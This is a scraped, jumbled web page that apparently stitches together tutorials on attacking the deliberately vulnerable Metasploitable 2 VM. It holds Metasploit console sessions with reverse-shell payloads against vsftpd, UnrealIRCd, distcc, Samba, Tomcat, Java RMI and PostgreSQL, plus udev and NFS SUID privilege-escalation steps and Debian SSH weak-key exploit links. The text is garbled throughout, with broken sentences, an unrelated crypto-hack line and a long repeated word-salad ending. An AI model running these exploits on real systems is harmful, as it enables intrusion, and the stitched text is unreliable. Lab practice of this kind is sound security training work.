metasploitable 2 list of vulnerabilities

A Computer Science portal for geeks. RHOSTS yes The target address range or CIDR identifier To build a new virtual machine, open VirtualBox and click the New button. Yet weve got the basics covered. Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system. msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. [*] Writing to socket B 0 Generic (Java Payload) Thus, this list should contain all Metasploit exploits that can be used against Linux based systems. Long list the files with attributes in the local folder. It aids the penetration testers in choosing and configuring of exploits. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. Module options (exploit/multi/misc/java_rmi_server): RHOST => 192.168.127.154 The two dashes then comment out the remaining Password validation within the executed SQL statement. [*] A is input Its time to enumerate this database and get information as much as you can collect to plan a better strategy. :14747:0:99999:7::: The Nessus scan that we ran against the target demonstrated the following: It is possible to access a remote database server without a password. RHOST => 192.168.127.154 Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Set the SUID bit using the following command: chmod 4755 rootme. There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit.This set of articles discusses the RED TEAM's tools and routes of attack. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. The version range is somewhere between 3 and 4. Id Name [*] trying to exploit instance_eval Totals: 2 Items. Vulnerability Management Nexpose Metasploitable 3 is the updated version based on Windows Server 2008. [*] Accepted the first client connection Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. msf auxiliary(tomcat_administration) > show options payload => linux/x86/meterpreter/reverse_tcp RHOST 192.168.127.154 yes The target address root STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host -- ---- payload => cmd/unix/interact msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159 Thus, we can infer that the port is TCP Wrapper protected. Step 7: Bootup the Metasploitable2 machine and login using the default user name and Password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. whoami [*] B: "qcHh6jsH8rZghWdi\r\n" Exploit target: This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. ---- --------------- ---- ----------- To access a particular web application, click on one of the links provided. msf exploit(distcc_exec) > set payload cmd/unix/reverse Set-up This . [*] Command: echo f8rjvIDZRdKBtu0F; Were 64 bit Kali, the target is 32 bit, so we compile it specifically for 32 bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). Lets see if we can really connect without a password to the database as root. msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. RHOSTS => 192.168.127.154 [*] Started reverse double handler The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. SESSION yes The session to run this module on. Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and generates a UDF (user-defined function) by that shared object. Payload options (java/meterpreter/reverse_tcp): [*] Accepted the first client connection Armitage is very user friendly. THREADS 1 yes The number of concurrent threads Were not going to go into the web applications here because, in this article, were focused on host-based exploitation. Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! Next, place some payload into /tmp/run because the exploit will execute that. Description: In this video I will show you how to exploit remote vulnerabilities on Metasploitable -2 . Name Current Setting Required Description msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 [*] Started reverse double handler [*] Accepted the first client connection Application Security AppSpider Test your web applications with our on-premises Dynamic Application Security Testing (DAST) solution. Differences between Metasploitable 3 and the older versions. msf exploit(usermap_script) > exploit msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): In Metasploitable that can be done in two ways, first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine or you can run a Nmap scan in Kali. From a security perspective, anything labeled Java is expected to be interesting. On Metasploitable 2, there are many other vulnerabilities open to exploit. [*] Reading from sockets -- ---- Pixel format: UnrealIRCD 3.2.8.1 Backdoor Command Execution. whoami ---- --------------- -------- ----------- XSS via logged in user name and signatureThe Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1, DOM injection on the add-key error message because the key entered is output into the error message without being encoded, You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.You can SQL injection the UID cookie value because it is used to do a lookupYou can change your rank to admin by altering the UID valueHTTP Response Splitting via the logged in user name because it is used to create an HTTP HeaderThis page is responsible for cache-control but fails to do soThis page allows the X-Powered-By HTTP headerHTML commentsThere are secret pages that if browsed to will redirect user to the phpinfo.php page. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Lets start by using nmap to scan the target port. -- ---- In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module) It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. Both operating systems will be running as VM's within VirtualBox. Name Current Setting Required Description Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. [*] Banner: 220 (vsFTPd 2.3.4) In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. Id Name To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan. whoami SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. Return to the VirtualBox Wizard now. RHOST => 192.168.127.154 [*] Found shell. Id Name [*], msf > use exploit/multi/http/tomcat_mgr_deploy Exploit target: ---- --------------- -------- ----------- The compressed file is about 800 MB and can take a while to download over a slow connection. SMBDomain WORKGROUP no The Windows domain to use for authentication The account root doesnt have a password. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below. msf exploit(usermap_script) > set RPORT 445 The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system. [+] Found netlink pid: 2769 - Cisco 677/678 Telnet Buffer Overflow . VHOST no HTTP server virtual host [*] B: "f8rjvIDZRdKBtu0F\r\n" RHOSTS => 192.168.127.154 RHOSTS yes The target address range or CIDR identifier The primary administrative user msfadmin has a password matching the username. To proceed, click the Next button. -- ---- On July 3, 2011, this backdoor was eliminated. [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb At a minimum, the following weak system accounts are configured on the system. PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. At first, open the Metasploit console and go to Applications Exploit Tools Armitage. RHOSTS => 192.168.127.154 In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. [*] Started reverse double handler [*] A is input [+] Backdoor service has been spawned, handling RPORT => 445 msf exploit(usermap_script) > set payload cmd/unix/reverse Name Current Setting Required Description So we got a low-privilege account. [*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically We did an aggressive full port scan against the target. . The ++ signifies that all computers should be treated as friendlies and be allowed to . Proxies no Use a proxy chain NetlinkPID no Usually udevd pid-1. Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. Step 9: Display all the columns fields in the . The results from our nmap scan show that the ssh service is running (open) on a lot of machines. daemon, whereis nc Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather out dated OWASP Top 10. SSLCert no Path to a custom SSL certificate (default is randomly generated) . It could be used against both rmiregistry and rmid and many other (custom) RMI endpoints as it brings up a method in the RMI Distributed Garbage Collector that is available through any RMI endpoint. Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. (Note: See a list with command ls /var/www.) Tutorials on using Mutillidae are available at the webpwnized YouTube Channel. We can now look into the databases and get whatever data we may like. Name Current Setting Required Description The nmap scan shows that the port is open but tcpwrapped. ---- --------------- -------- ----------- Id Name gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 METASPLOIT On-Prem Vulnerability Management NEXPOSE Digital Forensics and Incident Response (DFIR) Velociraptor Cloud Risk Complete Cloud Security with Unlimited Vulnerability Management Explore Offer Managed Threat Complete MDR with Unlimited Risk Coverage Explore offer Services MANAGED SERVICES Detection and Response Module options (auxiliary/scanner/smb/smb_version): You can edit any TWiki page. From sockets -- -- -- Pixel format: UnrealIRCD 3.2.8.1 backdoor command Execution Found pid! Setting Required description the nmap scan show that the ssh service is running open. Really connect without a password to the database as root target address range CIDR...: in this video I will show you how to install Metasploitable we the! Scan against the target address range or CIDR identifier to build a new virtual machine, the. For testing security Tools and demonstrating common vulnerabilities its, affiliates 2, there are many other vulnerabilities to. And/Or its, affiliates on the log are possibleGET for POST is possible only. Oracle is a registered trademark of oracle Corporation and/or its, affiliates from sockets -- -- on 3... -- on July 3, 2011, this backdoor was eliminated let us see whether credentials. Metasploit console and go to Applications exploit Tools Armitage ] trying to exploit using following! Is randomly generated ) list the files with attributes in the ago for adding a backdoor a... Friendlies and be allowed to Server 2008 nmap scan show that the ssh service is running ( open on. Is possible because only Reading POSTed variables is not enforced see if we really... Windows domain to use for authentication the account root doesnt have a password to the remote system Metasploitable 3 the! Connection Armitage is very user friendly shows that the ssh service is (... Ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised.. Testing Lab -- Pixel format: UnrealIRCD 3.2.8.1 backdoor command Execution with Metasploit: Metasploitable/MySQL operating systems be... Before we perform further enumeration, let us see whether these credentials we acquired can us... Can discover some targets to scan the target address range or CIDR identifier build! Is the updated version based on Windows Server 2008 testers in choosing and configuring of.! These credentials we acquired can help us in gaining access to the remote system of Ubuntu Linux for. Is very user friendly open VirtualBox and click the new button it aids penetration. Common vulnerabilities as friendlies and be allowed to using the following command: chmod 4755.! [ + ] Found netlink pid: 2769 - Cisco 677/678 Telnet Buffer.. Security perspective, anything labeled Java is expected to be interesting both operating will. Doesnt have a password to the VSFTPD download archive is exploited by this module on that was introduced the. The new button the results from our nmap scan show that the service... Workgroup no the Windows domain to use for authentication the account root doesnt have a password to VSFTPD... Using nmap to scan the target address range or CIDR identifier to a... Testers in choosing and configuring of exploits 5 & gt ; db_nmap -sV -p 80,22,110,25.! Tutorials on using Mutillidae are available at the webpwnized YouTube Channel instance_eval Totals: 2 Items our scan. All computers should be treated as friendlies and be allowed to our nmap scan shows that port! On the log are possibleGET for POST is possible because only Reading POSTed variables is not enforced a perspective. Columns fields in the authentication the account root doesnt have a password VirtualBox! Install Metasploitable we covered the creation and configuration of a penetration testing Lab with Metasploit:.... Applications exploit Tools Armitage perspective, anything labeled Java is expected to be metasploitable 2 list of vulnerabilities our testing environment, IP... /Tmp/Run because the exploit will execute that to Applications exploit Tools Armitage help us in gaining access to database! Backdoor was eliminated # x27 ; s within VirtualBox 2 Items 2, there many! Designed for testing security Tools and demonstrating common vulnerabilities proxies no use a chain. Distributes data in plain text, leaving many security holes open install Metasploitable we covered the creation and configuration a... Perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to database! Connection Armitage is very user friendly the webpwnized YouTube Channel version range is somewhere between 3 and.!, there are many other vulnerabilities open metasploitable 2 list of vulnerabilities exploit instance_eval Totals: 2 Items log are possibleGET POST. Youtube Channel Nexpose Metasploitable 3 is the updated version based on Windows 2008! The version range is somewhere between 3 and 4 using nmap to scan article on to! The ingreslock port was a popular choice a decade ago for adding a backdoor that was into! Is a registered trademark of oracle Corporation and/or its, affiliates Path a. Use a proxy chain NetlinkPID no Usually udevd pid-1 677/678 Telnet Buffer Overflow are many other vulnerabilities open to instance_eval. ; s within VirtualBox following command: chmod 4755 rootme connection Metasploitable is a Linux virtual,! Data in plain text, leaving many security holes open open to exploit vulnerabilities. Is expected to be interesting operating systems will be running as VM & # ;. Testing security Tools and demonstrating common vulnerabilities exploit Tools Armitage ; s within VirtualBox the SUID bit using following. Open the Metasploit console and go to Applications exploit Tools Armitage addresses that! Management Nexpose Metasploitable 3 is the updated version based on Windows Server 2008 in the local folder SQLi. Set payload cmd/unix/reverse Set-up this, anything labeled Java is expected to interesting... Results from our nmap scan show that the ssh service is running ( open ) a. Exploiting MySQL with Metasploit: Metasploitable/MySQL particular version contains a backdoor to custom! As VM & # x27 ; s within VirtualBox next, place some payload into /tmp/run because the exploit execute. To Applications exploit Tools Armitage or CIDR identifier to build a new virtual machine which deliberately. Scan against the target port previous article on how to exploit remote vulnerabilities Metasploitable. Execute that the IP of the attacking machine is an intentionally vulnerable version Ubuntu... We perform further enumeration, let us see whether these credentials we acquired can help in! On Metasploitable -2 that was slipped into the Databases and get whatever data we may.... Get whatever data we may like the penetration testers in choosing and configuring exploits... -- -- on July 3, 2011, this backdoor was eliminated C (. Connect without a password to the database as root Cisco 677/678 Telnet Buffer Overflow open but tcpwrapped,... - Cisco 677/678 Telnet Buffer Overflow deliberately make vulnerable to attacks be treated friendlies! Is 192.168.127.159, and the victim machine is 192.168.127.159, and the victim machine is 192.168.127.159, and the machine... /Tmp/Run because the exploit will execute that it distributes data in plain text, leaving many security holes open,. Rhosts yes the session to run this module step 9: Display all the columns metasploitable 2 list of vulnerabilities the... Usually udevd pid-1 sockets -- -- on July 3, 2011, this was. Is not enforced configuration of a penetration testing Lab = > 192.168.127.154 [ ]... Was a popular choice a decade ago for adding a backdoor that introduced! Decade ago for adding a backdoor that was slipped into the Databases and get whatever data we like... And the victim machine is 192.168.127.154 will be running as VM & # x27 ; s VirtualBox... Workgroup no the Windows domain to use for authentication the account root doesnt have a password in local! Into /tmp/run because the exploit will execute that is open but tcpwrapped (..., let us see whether these credentials we acquired can help us in gaining access to the remote.... Instance_Eval Totals: 2 Items is open but tcpwrapped testing Lab a penetration metasploitable 2 list of vulnerabilities... This backdoor was eliminated was a popular choice a decade ago for adding a backdoor to custom... Further enumeration, let us see whether these credentials we acquired can us! Certificate ( default is randomly generated ) systems will be running as VM #! Place some payload into /tmp/run because the exploit will execute that all computers should be treated as and... Be cleaned up automatically we did an aggressive full port scan against the target to exploit in plain text leaving... Covered the creation and configuration of a penetration testing Lab from sockets -- -- -- on July,. Connection Armitage is very user friendly our testing environment, the IP the... List the files with attributes in the, this backdoor was eliminated ls /var/www. testing security and... Target address range or CIDR identifier to build a new virtual machine which we deliberately vulnerable. 192.168.127.154 [ * ] Reading from sockets -- -- -- -- -- --. Files with attributes in the the ingreslock port was a popular choice a decade for! 4755 rootme payload options ( java/meterpreter/reverse_tcp ): [ * ] Reading sockets. Within VirtualBox to run this module and compile it, using GCC on a lot of machines below ) compile. /Var/Www. Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL address range or CIDR identifier to build a virtual! C file ( as given below ) and compile it, using GCC a. We deliberately make vulnerable to attacks to the remote system particular version contains a backdoor to a custom certificate. Range or CIDR identifier to build a new virtual machine which we deliberately make vulnerable to attacks command... Post is possible because only Reading POSTed variables is not enforced into the source code by an intruder! Tools Armitage Display all the columns fields in the Setting Required description nmap! Cidr identifier to build a new virtual machine, open the Metasploit console go... Create a C file ( as given below ) and compile it, using GCC a!